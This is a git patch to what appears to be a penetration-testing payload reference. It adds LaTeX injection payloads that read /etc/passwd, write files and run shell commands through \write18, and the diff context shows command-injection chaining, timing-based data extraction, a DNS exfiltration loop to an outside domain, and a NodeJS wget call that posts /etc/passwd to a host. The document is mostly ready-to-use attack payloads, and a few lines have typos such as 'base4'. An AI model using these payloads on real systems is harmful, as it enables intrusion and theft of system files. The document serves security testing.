From 15891b3ab41ec8ea5ef8f89750d26808c915e0f9 Mon Sep 17 00:00:00 2001 From: Swissky Date: Sun, 22 Jul 2018 22:35:46 +0200 Subject: [PATCH] LaTeX injection + RCE bypass with backslash --- LaTeX injection/README.md | 57 +++++++++++++++++++++++++++++ Remote commands execution/README.md | 31 +++++++++------- 2 files changed, 75 insertions(+), 13 deletions(-) create mode 100644 LaTeX injection/README.md diff --git a/LaTeX injection/README.md b/LaTeX injection/README.md new file mode 100644 index 00000000..4407bad5 --- /dev/null +++ b/LaTeX injection/README.md @@ -0,0 +1,57 @@ +# LaTex Injection + +## Read file +```python +\input{/etc/passwd} +\include{password} # load .tex file +``` + +Read single lined file +```python +\newread\file +\openin\file=/etc/issue +\read\file to\line +\text{\line} +\closein\file +``` + +Read multiple lined file +```python +\newread\file +\openin\file=/etc/passwd +\loop\unless\ifeof\file + \read\file to\fileline + \text{\fileline} +\repeat +\closein\file +``` + +## Write file +```python +\newwrite\outfile +\openout\outfile=cmd.tex +\write\outfile{Hello-world} +\closeout\outfile +``` + +## Command execution +The input of the command will be redirected to stdin, use a temp file to get it. +```python +\immediate\write18{env > output} +\input{output} +``` +If you get any LaTex error, consider using base64 to get the result without bad characters +```python +\immediate\write18{env | base64 > test.tex} +\input{text.tex} +``` + +```python +\input|ls|base4 +``` + + +## Thanks to +* [Hacking with LaTeX - Sebastian Neef - 0day.work](https://0day.work/hacking-with-latex/) +* [Latex to RCE, Private Bug Bounty Program - Yasho](https://medium.com/bugbountywriteup/latex-to-rce-private-bug-bounty-program-6a0b5b33d26a) +* [Pwning coworkers thanks to LaTeX](http://scumjr.github.io/2016/11/28/pwning-coworkers-thanks-to-latex/) \ No newline at end of file diff --git a/Remote commands execution/README.md b/Remote commands execution/README.md index 5209dc6f..0aa1f6bc 100644 --- a/Remote commands execution/README.md +++ b/Remote commands execution/README.md @@ -4,7 +4,7 @@ Remote Commands execution is a security vulnerability that allows an attacker to ## Exploits Normal Commands execution, execute the command and voila :p -``` +```powershell cat /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh @@ -13,7 +13,7 @@ sys:x:3:3:sys:/dev:/bin/sh ``` Commands execution by chaining commands -``` +```powershell original_cmd_by_server; ls original_cmd_by_server && ls original_cmd_by_server | ls @@ -21,13 +21,13 @@ original_cmd_by_server || ls Only if the first cmd fail ``` Commands execution inside a command -``` +```powershell original_cmd_by_server `cat /etc/passwd` original_cmd_by_server $(cat /etc/passwd) ``` Commands execution without space - Linux -``` +```powershell swissky@crashlab:~/Www$ cat /usr/bin/zsh echo whoami|$0 @@ -92,7 +97,7 @@ echo whoami|$0 ## Time based data exfiltration Extracting data : char by char -``` +```powershell swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi real 0m5.007s user 0m0.000s @@ -115,7 +120,7 @@ for i in $(ls /) ; do host "http://$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done ## Environment based NodeJS Commands execution -``` +```powershell require('child_process').exec('wget --post-data+"x=$(cat /etc/passwd)"+HOST') ```